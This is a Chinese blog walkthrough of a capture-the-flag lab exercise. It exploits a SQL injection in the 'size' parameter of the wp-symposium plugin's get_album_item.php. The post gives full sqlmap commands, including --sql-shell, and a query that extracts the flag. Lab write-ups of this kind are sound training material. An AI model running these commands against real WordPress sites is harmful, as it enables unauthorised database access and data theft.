1.阅读靶场介绍
这里给出了路径是wp-symposium/get_album_item.php
涉及的参数是size
用到的方法是sql注入
这样看来思路很清晰了,直接进入靶场吧
2.启动靶场
进入靶场后如下图所示
这里博主也提一下自己打靶场的一个春秋云境的经验
凡是遇到wordpress这类型的靶场
我们都是默认/wp-content/plugins/在前面加上这两个路径哟
好了,接下来进入poc环节了
3.poc
我们直接访问这个url
会出现如下图所示的页面
这里我们直接启动sqlmap
首先我们执行的是这个命令
sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch
看看会不会出现SQL注入的方法
结果是:
存在时间盲注的方式
接下来就是
执行这个语句
sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch --sql-shell
最后我们会得到发现可以进入界面
然后在执行这个命令
select flag from flag
稍等片刻以后就可以找到flag了
文章到此结束,恭喜各位又攻克一个靶场
期待博主出什么春秋云景教学的请留言哟
感谢各位宝贵的时间